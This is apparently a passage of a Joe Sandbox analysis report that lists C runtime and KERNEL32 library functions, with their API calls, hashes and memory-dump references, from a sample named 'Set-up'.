                                                                                              • Opcode ID: 2c13a29a1d925143d781af65c820b9608163722931f1573a2a11b60e5209cc42
                                                                                              • Instruction ID: f8b1116aa11dcd7a99ef3fa2a6b42383d618de8f118322b296214b13fac90255
                                                                                              • Opcode Fuzzy Hash: 2c13a29a1d925143d781af65c820b9608163722931f1573a2a11b60e5209cc42
                                                                                              • Instruction Fuzzy Hash: 2E4106B1A44284BFEB045F78ECC1D7E37A4EF46794B1002AAE5149B290FB7CCD408BA1
                                                                                              Function 6BB649C8 Relevance: 19.6, APIs: 13, Instructions: 140stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _malloc_crt.MSVCR100(00000355,00000000,6BB64E81,00000001,00000000,00000000), ref: 6BB649DC
                                                                                                • Part of subcall function 6BB60CD9: malloc.MSVCR100(00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7,00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60CE5
                                                                                                • Part of subcall function 6BB6498E: strcat_s.MSVCR100(6BB65C30,6BB65C0F,6BB65C20,?,00000083,00000083,?,6BB65C24,6BB65C0F,6BB65C30,00000002,6BB65C30,6BB65C0F,?,00000000,00000000), ref: 6BB649AD
                                                                                              • strcat_s.MSVCR100(00000004,00000351,6BB6498C,?,?,?,?,?,00000000,6BB64E81,00000001,00000000), ref: 6BB64A29
                                                                                              • strcmp.MSVCR100(00000000,00000010,?,?,?,?,?,?,?,?,00000000,6BB64E81,00000001,00000000), ref: 6BB64A46
                                                                                              • free.MSVCR100(6BB64E81,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BB64A8D
                                                                                              • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,6BB64E81,00000001), ref: 6BB90BD9
                                                                                              • free.MSVCR100(?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,6BB64E81), ref: 6BB90BE1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: freestrcat_s$__invoke_watson_malloc_crtmallocstrcmp
                                                                                              • String ID:
                                                                                              • API String ID: 1358975119-0
                                                                                              • Opcode ID: d4bd5e1de187d324ac2dbf7d1ceb68e0d9a8c46f7a163dad32a650accd3a9ef7
                                                                                              • Instruction ID: 102941d75ebea4338657f297d79326aaeaca759a61b2e08078f623f96b64d2cd
                                                                                              • Opcode Fuzzy Hash: d4bd5e1de187d324ac2dbf7d1ceb68e0d9a8c46f7a163dad32a650accd3a9ef7
                                                                                              • Instruction Fuzzy Hash: 7D416871904B85EFDB20AF6ADC91A5EBBF8EF01788B100869E041E7660F779E944CB10
                                                                                              Function 6BB62423 Relevance: 19.6, APIs: 13, Instructions: 110COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _lock.MSVCR100(0000000D,6BB62508,00000008,6BB62592,00000000,?,6BB625B6,00000000,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB62497
                                                                                                • Part of subcall function 6BB60C43: EnterCriticalSection.KERNEL32(00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60C5E
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 6BB624A9
                                                                                              • _lock.MSVCR100(0000000C,6BB62508,00000008,6BB62592,00000000,?,6BB625B6,00000000,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB624C5
                                                                                              • free.MSVCR100(00000000,6BB62508,00000008,6BB62592,00000000,?,6BB625B6,00000000,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB624F9
                                                                                              • free.MSVCR100(00000000), ref: 6BB87615
                                                                                              • free.MSVCR100(?,6BB62508,00000008,6BB62592,00000000,?,6BB625B6,00000000,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB87621
                                                                                              • free.MSVCR100(?,6BB62508,00000008,6BB62592,00000000,?,6BB625B6,00000000,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB8762D
                                                                                              • free.MSVCR100(?,6BB62508,00000008,6BB62592,00000000,?,6BB625B6,00000000,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB87639
                                                                                              • free.MSVCR100(?,6BB62508,00000008,6BB62592,00000000,?,6BB625B6,00000000,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB87645
                                                                                              • free.MSVCR100(?,6BB62508,00000008,6BB62592,00000000,?,6BB625B6,00000000,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB87651
                                                                                              • free.MSVCR100(?,6BB62508,00000008,6BB62592,00000000,?,6BB625B6,00000000,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB8765D
                                                                                              • free.MSVCR100(?,6BB62508,00000008,6BB62592,00000000,?,6BB625B6,00000000,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB87669
                                                                                              • free.MSVCR100(?,?,6BB625B6,00000000,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB87675
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: free$_lock$CriticalDecrementEnterInterlockedSection
                                                                                              • String ID:
                                                                                              • API String ID: 3254847666-0
                                                                                              • Opcode ID: e474b31f19507d10e31a6d55371f784ac083db41777c003da64b7b6c3c119638
                                                                                              • Instruction ID: 65b90eb0ba79d41d5e11f73c596d2bc332ba617e8f2498a90ed9a5c3a712fa83
                                                                                              • Opcode Fuzzy Hash: e474b31f19507d10e31a6d55371f784ac083db41777c003da64b7b6c3c119638
                                                                                              • Instruction Fuzzy Hash: 0231C472B597C19AE7209B7A9985B0E33A8AF41FD9F60444DE5549B180FB7CEE808610
                                                                                              Function 6BB729FE Relevance: 19.6, APIs: 13, Instructions: 93COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFullPathNameA.KERNEL32(?,?,00000000,?), ref: 6BB72A42
                                                                                              • GetFullPathNameA.KERNEL32(?,00000000,00000000,00000000), ref: 6BB87A58
                                                                                              • GetLastError.KERNEL32 ref: 6BB87A5E
                                                                                              • __dosmaperr.LIBCMT(00000000), ref: 6BB87A65
                                                                                              • _errno.MSVCR100 ref: 6BB87A7F
                                                                                              • calloc.MSVCR100(?,00000001), ref: 6BB87A94
                                                                                              • _errno.MSVCR100 ref: 6BB87AA5
                                                                                              • _errno.MSVCR100 ref: 6BB87AB2
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB87ABD
                                                                                              • free.MSVCR100(00000000), ref: 6BB87ACB
                                                                                              • _errno.MSVCR100 ref: 6BB87AD1
                                                                                              • free.MSVCR100(00000000), ref: 6BB87AE8
                                                                                              • _getcwd.MSVCR100(?,?), ref: 6BB87AF9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$FullNamePathfree$ErrorLast__dosmaperr_getcwd_invalid_parameter_noinfocalloc
                                                                                              • String ID:
                                                                                              • API String ID: 4002649621-0
                                                                                              • Opcode ID: e98d502299391c2a809cc6ed4aa46432ddf00955ca7c2eed3814f769559d4967
                                                                                              • Instruction ID: 3afd8cc6c6a7e90d735f6ab8be64212d3a5444937d90e0e7ee56e2a4f1be91ca
                                                                                              • Opcode Fuzzy Hash: e98d502299391c2a809cc6ed4aa46432ddf00955ca7c2eed3814f769559d4967
                                                                                              • Instruction Fuzzy Hash: D721B5726082C9AEDB105EB6DCC1A5E37A9EB417ACB140465F5148B190FBBDCE41CFA0
                                                                                              Function 6BB61E61 Relevance: 19.6, APIs: 13, Instructions: 93COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFullPathNameW.KERNEL32(?,?,00000000,?), ref: 6BB61EA6
                                                                                              • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000), ref: 6BB87B41
                                                                                              • GetLastError.KERNEL32 ref: 6BB87B47
                                                                                              • __dosmaperr.LIBCMT(00000000), ref: 6BB87B4E
                                                                                              • _errno.MSVCR100 ref: 6BB87B6B
                                                                                              • calloc.MSVCR100(?,00000002), ref: 6BB87B80
                                                                                              • _errno.MSVCR100 ref: 6BB87B91
                                                                                              • _errno.MSVCR100 ref: 6BB87B9E
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB87BA9
                                                                                              • free.MSVCR100(00000000), ref: 6BB87BB7
                                                                                              • _errno.MSVCR100 ref: 6BB87BBD
                                                                                              • free.MSVCR100(00000000), ref: 6BB87BD4
                                                                                              • _wgetcwd.MSVCR100(?,?), ref: 6BB87BE5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$FullNamePathfree$ErrorLast__dosmaperr_invalid_parameter_noinfo_wgetcwdcalloc
                                                                                              • String ID:
                                                                                              • API String ID: 3145916893-0
                                                                                              • Opcode ID: 4087ecddb8bf2879b2bc6dfefd196f1baa78567e70f6250dd711a1b8dcf68be5
                                                                                              • Instruction ID: 3dd5e74c8a6f3b74a06c0d572e7efbdcd32abae2091be680ecff6986d172cc48
                                                                                              • Opcode Fuzzy Hash: 4087ecddb8bf2879b2bc6dfefd196f1baa78567e70f6250dd711a1b8dcf68be5
                                                                                              • Instruction Fuzzy Hash: 5B217F726082C9AFDB015FB6DCE1E6E37AAEB4139CF144465E5108B1A0FBBCCC408A61
                                                                                              Function 6BB6F805 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 127COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              • `non-type-template-parameter, xrefs: 6BB8D126
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameName::
                                                                                              • String ID: `non-type-template-parameter
                                                                                              • API String ID: 1333004437-4247534891
                                                                                              • Opcode ID: b845cdd65998f3bc33125495ae042eebdc77ce8e3016d2d0966c4d45f624f8cc
                                                                                              • Instruction ID: b52a0ee7df4f32dffb6328994e5a140ab1a62a660f2fa207a3013b53555c84dc
                                                                                              • Opcode Fuzzy Hash: b845cdd65998f3bc33125495ae042eebdc77ce8e3016d2d0966c4d45f624f8cc
                                                                                              • Instruction Fuzzy Hash: DE41E1B19442C5EFDB05DF68D881AAA3BB5EF42788F0480AED9448B251EB39DD46CB40
                                                                                              Function 6BB77949 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 109COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _getptd$MatchType
                                                                                              • String ID: MOC$RCC$csm$csm
                                                                                              • API String ID: 965401092-1441736206
                                                                                              • Opcode ID: 6b576735584244a2e40a0ad04f2e8cbcfa8abaa534f1e88dcbd532e97dde6d74
                                                                                              • Instruction ID: 6533c164b21c523e5d675e7e6cea0b53c0befe355a0b7a1b7b01f5375bea65a5
                                                                                              • Opcode Fuzzy Hash: 6b576735584244a2e40a0ad04f2e8cbcfa8abaa534f1e88dcbd532e97dde6d74
                                                                                              • Instruction Fuzzy Hash: 7A31C271501688EFDB20DF6AC480B6D73B8EF41304F5446AAD86587161D77CD585CB92
                                                                                              Function 6BB6F608 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 83COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameName::operator+
                                                                                              • String ID: cli::array<$cli::pin_ptr<$void$void
                                                                                              • API String ID: 1360548761-456688812
                                                                                              • Opcode ID: 6356b530b1711b70820e6ea2aa4f74d1087844695753eea2554b11bf2697c958
                                                                                              • Instruction ID: edfd6485d16296b8fa5c81c2c829796843681aac2426891f79cb25814756f676
                                                                                              • Opcode Fuzzy Hash: 6356b530b1711b70820e6ea2aa4f74d1087844695753eea2554b11bf2697c958
                                                                                              • Instruction Fuzzy Hash: 3C217C75944289AFDF05DF64E841DEE3BB9EF05358F4044ABE9149B250EB39EA40CB50
                                                                                              Function 6BB6826F Relevance: 16.7, APIs: 11, Instructions: 193COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 6BB67493
                                                                                              • free.MSVCR100(?), ref: 6BB6749F
                                                                                              • free.MSVCR100(?,?), ref: 6BB674AA
                                                                                              • _calloc_crt.MSVCR100(00000001,00000050), ref: 6BB68292
                                                                                              • _malloc_crt.MSVCR100(00000004), ref: 6BB682B2
                                                                                                • Part of subcall function 6BB60CD9: malloc.MSVCR100(00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7,00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60CE5
                                                                                              • _malloc_crt.MSVCR100(00000004), ref: 6BB682D5
                                                                                              • free.MSVCR100(00000000), ref: 6BB91699
                                                                                              • free.MSVCR100(00000000), ref: 6BB916A5
                                                                                              • free.MSVCR100(?,00000000), ref: 6BB916AD
                                                                                              • ___free_lconv_num.LIBCMT ref: 6BB916BC
                                                                                                • Part of subcall function 6BB6767A: GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6BB676C4
                                                                                                • Part of subcall function 6BB6767A: _calloc_crt.MSVCR100(00000000,00000002,?,?,00000000), ref: 6BB676D3
                                                                                                • Part of subcall function 6BB6767A: GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6BB676EC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: free$InfoLocale_calloc_crt_malloc_crt$DecrementInterlocked___free_lconv_nummalloc
                                                                                              • String ID:
                                                                                              • API String ID: 2828155784-0
                                                                                              • Opcode ID: a85e83d3c79d5b18fff3dc2ddf408c6c3061759aa6f01854116d04b1bbbe49b3
                                                                                              • Instruction ID: 86489e12fce8b748493df169831704c47d6c0291ff40c2e7d55417c31b2cbf1c
                                                                                              • Opcode Fuzzy Hash: a85e83d3c79d5b18fff3dc2ddf408c6c3061759aa6f01854116d04b1bbbe49b3
                                                                                              • Instruction Fuzzy Hash: 9351F472904294AFDB10DF79CC81B9A7BF9EB46780F1445AAE905DB280F7B8DD40CB60
                                                                                              Function 6BBA245A Relevance: 16.7, APIs: 11, Instructions: 153threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BBA2461
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,00000000,6BB9D96F,00000000,?,00000000,00000000), ref: 6BBA248C
                                                                                              • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000001,?,00000000,00000000), ref: 6BBA24E7
                                                                                                • Part of subcall function 6BBA214D: std::exception::exception.LIBCMT(6BBA1FE2,?,6BBA1FE2,00000001), ref: 6BBA216C
                                                                                                • Part of subcall function 6BBA214D: _CxxThrowException.MSVCR100(?,6BC00018,6BBA1FE2), ref: 6BBA2181
                                                                                              • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002,00000001,?,00000000,00000000), ref: 6BBA24F6
                                                                                              • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000003,00000002,00000001,?,00000000,00000000), ref: 6BBA2505
                                                                                              • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6BBA2514
                                                                                              • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000006,00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6BBA2523
                                                                                              • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000008,00000006,00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6BBA2532
                                                                                              • GetCurrentThread.KERNEL32 ref: 6BBA2550
                                                                                              • GetThreadPriority.KERNEL32(00000000), ref: 6BBA2557
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000838), ref: 6BBA2658
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Policy$Concurrency@@ElementKey@2@@Policy@SchedulerValue@$Thread$??2@CountCriticalCurrentExceptionH_prolog3InitializePrioritySectionSpinThrowstd::exception::exception
                                                                                              • String ID:
                                                                                              • API String ID: 138514572-0
                                                                                              • Opcode ID: 8fdd139189b893f49f3b43b430a235e9e345544ef76738d4d02e53ca82435585
                                                                                              • Instruction ID: 18923b48f9c4f16b8dda685ff241f1b5d4cf2d1588a102ac74b7299d71146f2a
                                                                                              • Opcode Fuzzy Hash: 8fdd139189b893f49f3b43b430a235e9e345544ef76738d4d02e53ca82435585
                                                                                              • Instruction Fuzzy Hash: E561F7B1B05A82AFD748CF39C485B99FBA2FF49700F44866ED46DC7640EB75A424CB80
                                                                                              Function 6BB6AC1E Relevance: 16.6, APIs: 11, Instructions: 119COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _getptd.MSVCR100(6BB6AC68,00000014,6BB6B231,000000FD,6BB6B281), ref: 6BB6AC2E
                                                                                                • Part of subcall function 6BB6AC84: _getptd.MSVCR100(6BB6ACE0,0000000C,6BB6D0AA,?,?,6BB69233,?), ref: 6BB6AC90
                                                                                                • Part of subcall function 6BB6AC84: _lock.MSVCR100(0000000D), ref: 6BB6ACA7
                                                                                              • _malloc_crt.MSVCR100(00000220,6BB6AC68,00000014,6BB6B231,000000FD,6BB6B281), ref: 6BB6B81E
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 6BB6B859
                                                                                              • InterlockedIncrement.KERNEL32(00000000), ref: 6BB6B87B
                                                                                              • _lock.MSVCR100(0000000D), ref: 6BB6B896
                                                                                              • InterlockedDecrement.KERNEL32 ref: 6BB6B90D
                                                                                              • InterlockedIncrement.KERNEL32(00000000), ref: 6BB6B922
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Interlocked$DecrementIncrement_getptd_lock$_malloc_crt
                                                                                              • String ID:
                                                                                              • API String ID: 4169461591-0
                                                                                              • Opcode ID: 849805874b8ae2d8a0e6e0e66f061f3925fac8afa1c2bffab30510486329dc28
                                                                                              • Instruction ID: 233b18bd34d6f3ad89dc9dd1bc12bafd7e51d5093a28921b83e413ad6e2e1004
                                                                                              • Opcode Fuzzy Hash: 849805874b8ae2d8a0e6e0e66f061f3925fac8afa1c2bffab30510486329dc28
                                                                                              • Instruction Fuzzy Hash: 7541B0319182D49FCB209F75C882B4D7BF0EB0A798F114969E4519B2A1FB7DCD81CB60
                                                                                              Function 6BB77A24 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 60COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _getptd$CreateFrameInfo
                                                                                              • String ID: csm
                                                                                              • API String ID: 4181383844-1018135373
                                                                                              • Opcode ID: 8ec51cf5f6161e2fe22f505791f89f019e248bd25405dbe91789e180930a91ee
                                                                                              • Instruction ID: da187fb47cca01cf886b5b5d518287b72d882a6e12798c46e8e4691723c09bac
                                                                                              • Opcode Fuzzy Hash: 8ec51cf5f6161e2fe22f505791f89f019e248bd25405dbe91789e180930a91ee
                                                                                              • Instruction Fuzzy Hash: A2119D31800781DED630AF778045B5877A4FF51724F948ABAD4788B5A1DB78EA44CB91
                                                                                              Function 6BB7608F Relevance: 15.2, APIs: 10, Instructions: 245COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,?,?,00000000,00000000), ref: 6BB7612C
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000), ref: 6BB76192
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,6BB76293,00000000,00000000,00000000), ref: 6BB761AB
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,6BB76293,00000000,00000000,00000000), ref: 6BB761FC
                                                                                              • CompareStringW.KERNEL32(?,?,00000000,?,00000000,00000000), ref: 6BB76210
                                                                                              • _freea_s.MSVCR100(00000000), ref: 6BB7621A
                                                                                              • _freea_s.MSVCR100(00000000), ref: 6BB76223
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$_freea_s$CompareString
                                                                                              • String ID:
                                                                                              • API String ID: 3891795400-0
                                                                                              • Opcode ID: bc3b5cdb8b63406cd4ffafd4cee6e3fb9a81105a924e89606b36c92cb1c8d66d
                                                                                              • Instruction ID: 6c97d502557a9cfd9e12fda9349425883d5a38262a0178ac1cad6153194b0a98
                                                                                              • Opcode Fuzzy Hash: bc3b5cdb8b63406cd4ffafd4cee6e3fb9a81105a924e89606b36c92cb1c8d66d
                                                                                              • Instruction Fuzzy Hash: D881D131A0068A9FDF21AE68DC95BEE7BB2DF46720F1401B9E931E61A1D73DD940CB50
